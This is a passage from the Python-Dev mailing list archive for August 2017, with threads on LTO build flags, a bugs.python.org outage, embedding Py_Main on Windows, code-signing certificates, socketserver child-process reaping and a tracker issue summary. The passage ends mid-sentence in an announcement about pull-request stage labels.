>> > build LTO without PGO seems reasonable. I can review any pull requests >> > altering configure.ac and Makefile.pre.in to make such a change. >> >> Being able to separate them seems useful even if it's just from the >> performance research perspective of comparing "PGO only", "LTO only" >> and "PGO+LTO". > > That does not mean "LTO only" deserves a configure option, though. PGO > is difficult to set up manually so it's fair that we provide dedicated > build support for it. LTO should just be a matter of tweaking CFLAGS > and LDFLAGS. > > Regards > > Antoine. > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com From solipsis at pitrou.net Wed Aug 9 05:22:22 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 9 Aug 2017 11:22:22 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> Message-ID: <20170809112222.4d59a0f8@fsol> On Wed, 9 Aug 2017 11:16:36 +0200 Victor Stinner wrote: > There is already a ./configure --with-lto flag, why not using it? > > I'm using --with-lto without PGO for months, I never noticed that the > option is fully ignored! What are the reasons it is ignored? IIRC some compilers have buggy LTO support and it can lead to crashes during compilation. Regards Antoine. From victor.stinner at gmail.com Wed Aug 9 05:52:45 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Wed, 9 Aug 2017 11:52:45 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <20170809112222.4d59a0f8@fsol> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> <20170809112222.4d59a0f8@fsol> Message-ID: 2017-08-09 11:22 GMT+02:00 Antoine Pitrou : > What are the reasons it is ignored? IIRC some compilers have buggy LTO > support and it can lead to crashes during compilation. Issues with LTO: http://bugs.python.org/issue28032 http://bugs.python.org/issue28605 But since --with-lto is now an opt-in option, I don't why it should ignored when PGO is not used? Victor From ncoghlan at gmail.com Wed Aug 9 09:06:41 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 9 Aug 2017 23:06:41 +1000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <20170809095252.3340cd7b@fsol> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> <20170809095252.3340cd7b@fsol> Message-ID: On 9 August 2017 at 17:52, Antoine Pitrou wrote: > On Wed, 9 Aug 2017 13:36:28 +1000 > Nick Coghlan wrote: >> On 8 August 2017 at 10:12, Gregory P. Smith wrote: >> > I don't know whether it is beneficial or not - but having the capability to >> > build LTO without PGO seems reasonable. I can review any pull requests >> > altering configure.ac and Makefile.pre.in to make such a change. >> >> Being able to separate them seems useful even if it's just from the >> performance research perspective of comparing "PGO only", "LTO only" >> and "PGO+LTO". > > That does not mean "LTO only" deserves a configure option, though. PGO > is difficult to set up manually so it's fair that we provide dedicated > build support for it. LTO should just be a matter of tweaking CFLAGS > and LDFLAGS. I wouldn't be confident in my own ability to get those right for gcc, let alone getting them right for clang as well. Whereas if the "--with-lto" configure option just works, then I'd never need to worry about it :) It also means that if folks *do* investigate this, it eliminates a class of configuration bugs (i.e. "you didn't actually enable LTO correctly in your testing"). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From tjreedy at udel.edu Wed Aug 9 18:14:30 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Wed, 9 Aug 2017 18:14:30 -0400 Subject: [Python-Dev] bugs.python.org appears down Message-ID: And not just for me, for last couple of hours. http://downforeveryoneorjustme.com/bugs.python.org --- Terry Jan Reedy From mmangoba at python.org Wed Aug 9 18:18:37 2017 From: mmangoba at python.org (Mark Mangoba) Date: Wed, 9 Aug 2017 15:18:37 -0700 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST Message-ID: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> Dear Colleagues, I was just informed from our hosting provider for bugs.python.org , Hetzner Online - that the server is currently being migrated to a new data center. Unfortunately I was not informed ahead of time and working with the provider to better communicate and schedule future maintenance periods accordingly. Apologies for any inconvenience this has caused. I will be posting status updates at https://status.python.org/ . As many of you know, we are working to migrate this off the current hosting provider in the next 3 months. Best regards, Mark Mark Mangoba | PSF IT Manager | Python Software Foundation | mmangoba at python.org | python.org | Infrastructure Staff: infrastructure-staff at python.org | GPG: 2DE4 D92B 739C 649B EBB8 CCF6 DC05 E024 5F4C A0D1 -------------- next part -------------- An HTML attachment was scrubbed... URL: From python at mrabarnett.plus.com Wed Aug 9 19:12:12 2017 From: python at mrabarnett.plus.com (MRAB) Date: Thu, 10 Aug 2017 00:12:12 +0100 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> Message-ID: <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> On 2017-08-09 23:18, Mark Mangoba wrote: > Dear Colleagues, > > I was just informed from our hosting provider for bugs.python.org > , Hetzner Online - that the server is currently > being migrated to a new data center. > > Unfortunately I was not informed ahead of time and working with the > provider to better communicate and schedule future maintenance periods > accordingly. > > Apologies for any inconvenience this has caused. I will be posting > status updates at https://status.python.org/. > > As many of you know, we are working to migrate this off the current > hosting provider in the next 3 months. > Please could you use a date/time format that's more international, such as ISO 8601. From tjreedy at udel.edu Wed Aug 9 20:24:09 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Wed, 9 Aug 2017 20:24:09 -0400 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On 8/9/2017 7:12 PM, MRAB wrote: > On 2017-08-09 23:18, Mark Mangoba wrote: >> Dear Colleagues, >> >> I was just informed from our hosting provider for bugs.python.org >> , Hetzner Online - that the server is >> currently being migrated to a new data center. >> >> Unfortunately I was not informed ahead of time and working with the >> provider to better communicate and schedule future maintenance periods >> accordingly. >> >> Apologies for any inconvenience this has caused. I will be posting >> status updates at https://status.python.org/. >> >> As many of you know, we are working to migrate this off the current >> hosting provider in the next 3 months. >> > Please could you use a date/time format that's more international, such > as ISO 8601. I presume that would be something like 2017-08-10 04:00:00 UTC. -- Terry Jan Reedy From tjreedy at udel.edu Thu Aug 10 02:19:16 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Thu, 10 Aug 2017 02:19:16 -0400 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On 8/9/2017 8:24 PM, Terry Reedy wrote: > On 8/9/2017 7:12 PM, MRAB wrote: >> On 2017-08-09 23:18, Mark Mangoba wrote: >>> Dear Colleagues, >>> >>> I was just informed from our hosting provider for bugs.python.org >>> , Hetzner Online - that the server is >>> currently being migrated to a new data center. >>> >>> Unfortunately I was not informed ahead of time and working with the >>> provider to better communicate and schedule future maintenance >>> periods accordingly. >>> >>> Apologies for any inconvenience this has caused. I will be posting >>> status updates at https://status.python.org/. >>> >>> As many of you know, we are working to migrate this off the current >>> hosting provider in the next 3 months. >>> >> Please could you use a date/time format that's more international, >> such as ISO 8601. > > I presume that would be something like 2017-08-10 04:00:00 UTC. Fetching pages came back, but updating issues is spotty. Some work, but for others "an error has occurred" even with multiple tries. -- Terry Jan Reedy From patrick.rutkowski at gmail.com Thu Aug 10 02:26:23 2017 From: patrick.rutkowski at gmail.com (Patrick Rutkowski) Date: Thu, 10 Aug 2017 02:26:23 -0400 Subject: [Python-Dev] Py_Main() seems to be a NOOP Message-ID: I'm working on Windows with Python 3.6. I'm trying to make a wWinMain() GUI application that uses an embedded python interpreter. I'm having various issues with being unable to load extension modules, but I won't go into that now because I've tracked my issue down to a much simpler test case. To begin, consider the source code of pythonw.exe: /* Minimal main program -- everything is loaded from the library. */ #include "Python.h" #define WIN32_LEAN_AND_MEAN #include int WINAPI wWinMain( HINSTANCE hInstance, /* handle to current instance */ HINSTANCE hPrevInstance, /* handle to previous instance */ LPWSTR lpCmdLine, /* pointer to command line */ int nCmdShow /* show state of window */ ) { return Py_Main(__argc, __wargv); } Now consider a simple python script, which I save in source.py f = open('C:\\Users\\rutski\\Desktop\\hello.txt', 'w') f.write('Hello World!\n') f.flush() f.close() and run with > pythonw.exe source.py This produces the file `hello.txt` with the expected output. Now I create a new Visual Studio solution. I make it Win32 project, choose "Windows Application" and "Empty Project." I create a new source file main.c and I copy-paste the source code of from pythonw (with Py_Main and all that). Now I add the following settings: C:\Users\rutski\Documents\python\PCbuild\amd64 --- Library Search Directory C:\Users\rutski\Documents\python\Include --- Include Directory C:\Users\rutski\Documents\python\PC --- Include Directory (for pyconfig.h) I choose "Debug | x64" and hit build. I pop open cmd.exe, browse to where mything.exe is, and execute > mything.exe source.py But this time nothing happens. No hello.txt gets created. I get no crash window or error message. I do not get thrown into a debugger. I just get no result. Am I missing some build flags here or something? I'm running the __exact__ same C code that pythonw.exe is, but mine isn't working. What gives? I can't even seem to get Py_Main() to execute some python code from within my own application, so trying to write my own embed code is basically hopeless. If anybody could shed any light on this it would be much appreciated! -Patrick From patrick.rutkowski at gmail.com Thu Aug 10 03:26:25 2017 From: patrick.rutkowski at gmail.com (Patrick Rutkowski) Date: Thu, 10 Aug 2017 03:26:25 -0400 Subject: [Python-Dev] Py_Main() seems to be a NOOP In-Reply-To: References: Message-ID: On Thu, Aug 10, 2017 at 2:26 AM, Patrick Rutkowski wrote: > I'm working on Windows with Python 3.6. I'm trying to make a wWinMain() GUI > application that uses an embedded python interpreter. I'm having various > issues with being unable to load extension modules, but I won't go into that > now because I've tracked my issue down to a much simpler test case. > > To begin, consider the source code of pythonw.exe... Follow up. Filed a bug in the python issue tracker: https://mail.google.com/mail/u/0/#inbox/15dcb0731f605c44 From tjreedy at udel.edu Thu Aug 10 06:27:08 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Thu, 10 Aug 2017 06:27:08 -0400 Subject: [Python-Dev] Py_Main() seems to be a NOOP In-Reply-To: References: Message-ID: On 8/10/2017 3:26 AM, Patrick Rutkowski wrote: > On Thu, Aug 10, 2017 at 2:26 AM, Patrick Rutkowski > wrote: >> I'm working on Windows with Python 3.6. I'm trying to make a wWinMain() GUI >> application that uses an embedded python interpreter. I'm having various >> issues with being unable to load extension modules, but I won't go into that >> now because I've tracked my issue down to a much simpler test case. >> >> To begin, consider the source code of pythonw.exe... > > Follow up. Filed a bug in the python issue tracker: > https://mail.google.com/mail/u/0/#inbox/15dcb0731f605c44 This returns a solicitation for gmail. Try https://bugs.python.org/issue31172 instead. -- Terry Jan Reedy From berker.peksag at gmail.com Thu Aug 10 09:44:15 2017 From: berker.peksag at gmail.com (=?UTF-8?Q?Berker_Peksa=C4=9F?=) Date: Thu, 10 Aug 2017 16:44:15 +0300 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On Thu, Aug 10, 2017 at 9:19 AM, Terry Reedy wrote: > Fetching pages came back, but updating issues is spotty. Some work, but for > others "an error has occurred" even with multiple tries. And I can't login to my account. When I tried to login via Google OpenID, I got "There is already an account for myemail at address.com". I also tried to reset my password and I got "Invalid login" when I tried to login with my new password. --Berker From steve.dower at python.org Thu Aug 10 11:51:15 2017 From: steve.dower at python.org (Steve Dower) Date: Thu, 10 Aug 2017 08:51:15 -0700 Subject: [Python-Dev] Python's Windows code-signing certificate Message-ID: <8c9bb216-ec7b-8391-9b5e-330a81a8c7f4@python.org> Just a heads-up, primarily for Marc-Andre, but letting everyone know for awareness. Next time we need to renew the PSF code signing certificate used for Windows releases, we will need to use a different CA. Our current certificate is from StartCom, who are losing their status as a trusted CA on Windows, which means any of their certificates issued after the 26th of September this year will be treated as invalid: https://blogs.technet.microsoft.com/mmpc/2017/08/08/microsoft-to-remove-wosign-and-startcom-certificates-in-windows-10/ The certificate we have right now is valid through February 2019, so there's no urgency to change (unless we want to avoid the risk of "accidental certificate revocation", which is one of the reasons Microsoft has lost trust in StartCom). Because the revocation of the root CA has a start date, all of our current releases and future releases with the current certificate will be fine. Since this will likely harm StartCom's business, it's very likely that they will get their act together and by the time we come to renew they'll be acceptable again. But we probably do want to be planning ahead to switch CA regardless. And for our macOS and Linux friends who may be uncertain what I'm referring to: this is the certificate embedded in the installer and every executable binary in our Windows distributions. It has nothing to do with GPG or the signature files you can download from python.org (these are still associated with my personal and completely unverified key, which is fine since nobody on Windows actually cares about GPG :) ). Cheers, Steve From berker.peksag at gmail.com Thu Aug 10 12:06:44 2017 From: berker.peksag at gmail.com (=?UTF-8?Q?Berker_Peksa=C4=9F?=) Date: Thu, 10 Aug 2017 19:06:44 +0300 Subject: [Python-Dev] bugs.python.org - outage 08/09/17 until 8:00pm PST In-Reply-To: References: <5979F13A-99B0-48AD-895D-E3997B98C3C0@python.org> <077ae2a2-d3b9-c563-ef92-fbb19d667ce0@mrabarnett.plus.com> Message-ID: On Thu, Aug 10, 2017 at 4:44 PM, Berker Peksa? wrote: > On Thu, Aug 10, 2017 at 9:19 AM, Terry Reedy wrote: >> Fetching pages came back, but updating issues is spotty. Some work, but for >> others "an error has occurred" even with multiple tries. > > And I can't login to my account. When I tried to login via Google > OpenID, I got "There is already an account for myemail at address.com". I > also tried to reset my password and I got "Invalid login" when I tried > to login with my new password. Just an FYI: I'm now able to login to my account. Thank you everyone who worked on migrating bugs.p.o! --Berker From victor.stinner at gmail.com Fri Aug 11 09:44:49 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Fri, 11 Aug 2017 15:44:49 +0200 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes Message-ID: Hi, I'm working on reducing the failure rate of Python CIs (Travis CI, AppVeyor, buildbots). For that, I'm trying to reduce test side effects using "environment altered" warnings. This week, I worked on support.reap_children() which detects leaked child processes (usually created with os.fork()). I found a bug in the socketserver module: it waits for child processes completion, but only in non-blocking mode. If a child process takes too long, the server will never reads its exit status and so the server leaks "zombie processes". Leaking processes can increase the memory usage, spawning new processes can fail, etc. => http://bugs.python.org/issue31151 I changed the code to call waitpid() in blocking mode on each child process on server_close(), to ensure that all children completed when on server close: https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 After pushing my change, I'm not sure anymore if it's a good idea. There is a risk that server_close() blocks if a child is stuck on a socket recv() or send() for some reasons. Should we relax the code by waiting a few seconds (problem: hardcoded timeouts are always a bad idea), or *terminate* processes (SIGKILL on UNIX) if they don't complete fast enough? I don't know which applications use socketserver. How I can test if it breaks code in the wild? At least, I didn't notice any regression on Python CIs. Well, maybe the change is ok for the master branch. But I would like your opinion because now I would like to backport the fix to 2.7 and 3.6 branches. It might break some applications. If we *cannot* backport such change to 2.7 and 3.6 because it changes the behaviour, I will fix the bug in test_socketserver.py instead. What do you think? Victor From matt at vazor.com Fri Aug 11 11:22:17 2017 From: matt at vazor.com (Matt Billenstein) Date: Fri, 11 Aug 2017 15:22:17 +0000 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: <0101015dd1e38bdb-d2b1632f-623a-43e0-adfe-0c90278c838f-000000@us-west-2.amazonses.com> Common pattern I've used is to wait a bit, then send a kill signal. M -- Matt Billenstein matt at vazor.com Sent from my iPhone 6 (this put here so you know I have one) > On Aug 11, 2017, at 5:44 AM, Victor Stinner wrote: > > Hi, > > I'm working on reducing the failure rate of Python CIs (Travis CI, > AppVeyor, buildbots). For that, I'm trying to reduce test side effects > using "environment altered" warnings. This week, I worked on > support.reap_children() which detects leaked child processes (usually > created with os.fork()). > > I found a bug in the socketserver module: it waits for child processes > completion, but only in non-blocking mode. If a child process takes > too long, the server will never reads its exit status and so the > server leaks "zombie processes". Leaking processes can increase the > memory usage, spawning new processes can fail, etc. > > => http://bugs.python.org/issue31151 > > I changed the code to call waitpid() in blocking mode on each child > process on server_close(), to ensure that all children completed when > on server close: > > https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 > > After pushing my change, I'm not sure anymore if it's a good idea. > There is a risk that server_close() blocks if a child is stuck on a > socket recv() or send() for some reasons. > > Should we relax the code by waiting a few seconds (problem: hardcoded > timeouts are always a bad idea), or *terminate* processes (SIGKILL on > UNIX) if they don't complete fast enough? > > I don't know which applications use socketserver. How I can test if it > breaks code in the wild? > > At least, I didn't notice any regression on Python CIs. > > Well, maybe the change is ok for the master branch. But I would like > your opinion because now I would like to backport the fix to 2.7 and > 3.6 branches. It might break some applications. > > If we *cannot* backport such change to 2.7 and 3.6 because it changes > the behaviour, I will fix the bug in test_socketserver.py instead. > > What do you think? > > Victor > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/matt%40vazor.com From status at bugs.python.org Fri Aug 11 12:09:20 2017 From: status at bugs.python.org (Python tracker) Date: Fri, 11 Aug 2017 18:09:20 +0200 (CEST) Subject: [Python-Dev] Summary of Python tracker Issues Message-ID: <20170811160920.9AFE7565B0@psf.upfronthosting.co.za> ACTIVITY SUMMARY (2017-08-04 - 2017-08-11) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 6116 (+16) closed 36820 (+46) total 42936 (+62) Open issues with patches: 2341 Issues opened (42) ================== #30855: [2.7] test_tk: test_use() of test_tkinter.test_widgets randoml http://bugs.python.org/issue30855 reopened by haypo #31122: SSLContext.wrap_socket() throws OSError with errno == 0 http://bugs.python.org/issue31122 opened by nikratio #31123: fnmatch does not follow Unix fnmatch functionality http://bugs.python.org/issue31123 opened by Varun Agrawal #31128: Allow pydoc to run with an arbitrary hostname http://bugs.python.org/issue31128 opened by feanil #31129: RawConfigParser.items() is unusual in taking arguments http://bugs.python.org/issue31129 opened by odd_bloke #31131: asyncio.wait_for() TimeoutError doesn't provide full traceback http://bugs.python.org/issue31131 opened by chris.jerdonek #31132: test_prlimit from test_resource fails when building python3 in http://bugs.python.org/issue31132 opened by cstratak #31137: Add a path attribute to NamedTemporaryFile http://bugs.python.org/issue31137 opened by wsanchez #31139: Improve tracemalloc demo code in docs http://bugs.python.org/issue31139 opened by louielu #31140: Insufficient error message with incorrect formated string lite http://bugs.python.org/issue31140 opened by chris.259263 #31141: Start should be a keyword argument of the built-in sum http://bugs.python.org/issue31141 opened by Mark.Bell #31142: python shell crashed while input quotes in print() http://bugs.python.org/issue31142 opened by py78py90py #31143: lib2to3 requires source files for fixes http://bugs.python.org/issue31143 opened by tschiller #31144: add initializer to concurrent.futures.ProcessPoolExecutor http://bugs.python.org/issue31144 opened by nvdv #31145: PriorityQueue.put() fails with TypeError if priority_number in http://bugs.python.org/issue31145 opened by Miko??aj Babiak #31146: Docs: On non-public translations, language picker fallback to http://bugs.python.org/issue31146 opened by mdk #31147: a mostly useless check in list_extend() http://bugs.python.org/issue31147 opened by Oren Milman #31149: Add Japanese to the language switcher http://bugs.python.org/issue31149 opened by mdk #31151: test_socketserver: Warning -- reap_children() reaped child pro http://bugs.python.org/issue31151 opened by haypo #31153: Update docstrings of itertools functions http://bugs.python.org/issue31153 opened by serhiy.storchaka #31155: Encode set, frozenset, bytearray, and iterators as json arrays http://bugs.python.org/issue31155 opened by javenoneal #31158: test_pty: test_basic() fails randomly on Travis CI http://bugs.python.org/issue31158 opened by haypo #31159: Doc: Language switch can't switch on specific cases http://bugs.python.org/issue31159 opened by mdk #31161: Only check for print and exec parentheses cases for SyntaxErro http://bugs.python.org/issue31161 opened by mjpieters #31162: urllib.request.urlopen error http://bugs.python.org/issue31162 opened by chua.chewbock at gmail.com #31163: Return destination path in Path.rename and Path.replace http://bugs.python.org/issue31163 opened by albertogomcas #31164: test_functools: test_recursive_pickle() stack overflow on x86 http://bugs.python.org/issue31164 opened by haypo #31165: null pointer deref and segfault in list_slice (listobject.c:45 http://bugs.python.org/issue31165 opened by geeknik #31166: null pointer deref and segfault in _PyObject_Alloc (obmalloc.c http://bugs.python.org/issue31166 opened by geeknik #31169: Unknown-source assertion failure in multiprocessing/managers.p http://bugs.python.org/issue31169 opened by drallensmith #31171: multiprocessing.BoundedSemaphore of 32-bit python could not wo http://bugs.python.org/issue31171 opened by hongxu #31172: Py_Main() is totally broken on Visual Studio 2017 http://bugs.python.org/issue31172 opened by rutski #31174: test_tools leaks randomly references on x86 Gentoo Refleaks 3. http://bugs.python.org/issue31174 opened by haypo #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 opened by zyxtarmo #31176: Is a UDP transport also a ReadTransport/WriteTransport? http://bugs.python.org/issue31176 opened by twisteroid ambassador #31177: unittest mock's reset_mock throws an error when an attribute h http://bugs.python.org/issue31177 opened by hmvp #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 opened by haypo #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 opened by yselivanov #31180: test_multiprocessing_spawn hangs randomly on x86 Windows7 3.6 http://bugs.python.org/issue31180 opened by haypo #31181: Segfault in gcmodule.c:360 visit_decref (PyObject_IS_GC(op)) http://bugs.python.org/issue31181 opened by lchin #31182: Suggested Enhancements to zipfile & tarfile command line inter http://bugs.python.org/issue31182 opened by Steve Barnes #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 opened by George Collins Most recent 15 issues with no replies (15) ========================================== #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 #31182: Suggested Enhancements to zipfile & tarfile command line inter http://bugs.python.org/issue31182 #31181: Segfault in gcmodule.c:360 visit_decref (PyObject_IS_GC(op)) http://bugs.python.org/issue31181 #31180: test_multiprocessing_spawn hangs randomly on x86 Windows7 3.6 http://bugs.python.org/issue31180 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31177: unittest mock's reset_mock throws an error when an attribute h http://bugs.python.org/issue31177 #31176: Is a UDP transport also a ReadTransport/WriteTransport? http://bugs.python.org/issue31176 #31174: test_tools leaks randomly references on x86 Gentoo Refleaks 3. http://bugs.python.org/issue31174 #31165: null pointer deref and segfault in list_slice (listobject.c:45 http://bugs.python.org/issue31165 #31164: test_functools: test_recursive_pickle() stack overflow on x86 http://bugs.python.org/issue31164 #31155: Encode set, frozenset, bytearray, and iterators as json arrays http://bugs.python.org/issue31155 #31153: Update docstrings of itertools functions http://bugs.python.org/issue31153 #31146: Docs: On non-public translations, language picker fallback to http://bugs.python.org/issue31146 #31144: add initializer to concurrent.futures.ProcessPoolExecutor http://bugs.python.org/issue31144 #31139: Improve tracemalloc demo code in docs http://bugs.python.org/issue31139 Most recent 15 issues waiting for review (15) ============================================= #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 #31169: Unknown-source assertion failure in multiprocessing/managers.p http://bugs.python.org/issue31169 #31151: test_socketserver: Warning -- reap_children() reaped child pro http://bugs.python.org/issue31151 #31120: [2.7] Python 64 bit _ssl compile fails due missing buildinf_am http://bugs.python.org/issue31120 #31113: Stack overflow with large program http://bugs.python.org/issue31113 #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 #31046: ensurepip does not honour the value of $(prefix) http://bugs.python.org/issue31046 #31021: Clarify programming faq. http://bugs.python.org/issue31021 #31020: Add support for custom compressor in tarfile http://bugs.python.org/issue31020 #31015: PyErr_WriteUnraisable should be more verbose in Python 2.7 http://bugs.python.org/issue31015 #31013: gcc7 throws warning when pymem.h development header is used http://bugs.python.org/issue31013 #30950: Convert round() to Arument Clinic http://bugs.python.org/issue30950 Top 10 most discussed issues (10) ================================= #31113: Stack overflow with large program http://bugs.python.org/issue31113 12 msgs #31166: null pointer deref and segfault in _PyObject_Alloc (obmalloc.c http://bugs.python.org/issue31166 8 msgs #31169: Unknown-source assertion failure in multiprocessing/managers.p http://bugs.python.org/issue31169 8 msgs #22635: subprocess.getstatusoutput changed behavior in 3.4 (maybe 3.3. http://bugs.python.org/issue22635 7 msgs #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 7 msgs #31119: Signal tripped flags need memory barriers http://bugs.python.org/issue31119 6 msgs #31143: lib2to3 requires source files for fixes http://bugs.python.org/issue31143 6 msgs #27755: Retire DynOptionMenu with a ttk Combobox http://bugs.python.org/issue27755 4 msgs #29910: Ctrl-D eats a character on IDLE http://bugs.python.org/issue29910 4 msgs #30849: test_stress_delivery_dependent() of test_signal randomly fails http://bugs.python.org/issue30849 4 msgs Issues closed (45) ================== #19903: Idle: Use inspect.signature for calltips http://bugs.python.org/issue19903 closed by terry.reedy #29736: Optimize builtin types constructor http://bugs.python.org/issue29736 closed by haypo #30051: Document that the random module doesn't support fork http://bugs.python.org/issue30051 closed by haypo #30229: Closing a BufferedRandom calls lseek() mutliple times http://bugs.python.org/issue30229 closed by haypo #30369: test_thread crashed with SIGBUS on AMD64 FreeBSD 10.x Shared 3 http://bugs.python.org/issue30369 closed by haypo #30382: test_stdin_broken_pipe() of test_asyncio failed randomly on AM http://bugs.python.org/issue30382 closed by haypo #30653: test_socket hangs in ThreadableTest.tearDown() on AMD64 FreeBS http://bugs.python.org/issue30653 closed by haypo #30683: Enhance doctest support in regrtest --list-cases http://bugs.python.org/issue30683 closed by haypo #30834: Warning -- files was modified by test_import, After: ['@test http://bugs.python.org/issue30834 closed by haypo #30841: Fix a variable shadowing warning in Python-ast.c http://bugs.python.org/issue30841 closed by lukasz.langa #30845: [3.5] test_first_completed_some_already_completed() of test_co http://bugs.python.org/issue30845 closed by haypo #30857: test_bsddb3 hangs longer than 37 minutes on x86 Tiger 2.7 http://bugs.python.org/issue30857 closed by haypo #30885: test_subprocess hangs on AMD64 Windows8.1 Refleaks 3.x http://bugs.python.org/issue30885 closed by haypo #30982: AMD64 Windows8.1 Refleaks 3.x: compilation error, cannot open http://bugs.python.org/issue30982 closed by haypo #31010: test_socketserver.test_ForkingTCPServer(): threading_cleanup() http://bugs.python.org/issue31010 closed by haypo #31029: test_tokenize fails when run directly http://bugs.python.org/issue31029 closed by serhiy.storchaka #31036: building the python docs requires the blurb module http://bugs.python.org/issue31036 closed by larry #31041: test_handle_called_with_mp_queue() of test_logging: threading_ http://bugs.python.org/issue31041 closed by haypo #31045: Add a language switch to the Python documentation http://bugs.python.org/issue31045 closed by mdk #31068: [2.7] test_ttk_guionly hangs at self.tk.call('update') on AMD6 http://bugs.python.org/issue31068 closed by haypo #31070: test_threaded_import: KeyError ignored in _get_module_lock. I just pushed a change to Bedevere to help track what stage a pull request is in. The stages are: - awaiting review - awaiting core review - awaiting changes - awaiting change review - awaiting merge The "review" stage is for when a pull request has no reviews either approving or requesting changes (this only applies to PRs not by a core dev; all PRs created by a core dev are flagged as awaiting merge immediately). The "core review" stage is when a review has been done by one or more non-core folk, but no core devs. The idea with the distinction is to encourage people to help in doing initial reviewing of PRs who happen to not be core devs since triaging issues and reviewing pull requests is the biggest chunk of work in maintaining CPython. The "changes" stage occurs when a core dev requests changes to a PR (a non-core dev review will not trigger this). A comment will be left to this effect with instructions for the PR creator to leave a comment saying "I didn't expect the Spanish Inquisition" to signal when they believe they are done addressing the reviewer's comments (there is also appropriate comments to explain the quote along with an easter egg(s) :) . The "change review" label means that the PR creator left the Spanish Inquisition quote and so now the core dev(s) who requested changes should re-review the PR. There will be a comment mentioning the core devs to this effect so that they will get a proper GitHub notification and they can check the label to see if the PR creator believes they are ready for another round of review (compared to now where you have to hunt around in the PR to see if it's ready for another review). The "merge" label means the PR has received an approving review from a core dev and so it should be ready to go. Now when any state change happens to trigger these labels, any preexisting "awaiting" label will be cleared and the new one set. But removing or setting a label manually won't trigger an action, so in this instance you can override Bedevere manually until some later event occurs which triggers an automatic update. One thing I do want to call out is that it's now more important that core devs leave appropriate "approved" and "request changes" reviews through the GitHub UI instead of just leaving a comment when they approve or want changes to a PR, respectively. Not only is this necessary to automate this part of the stage labeling, but it also 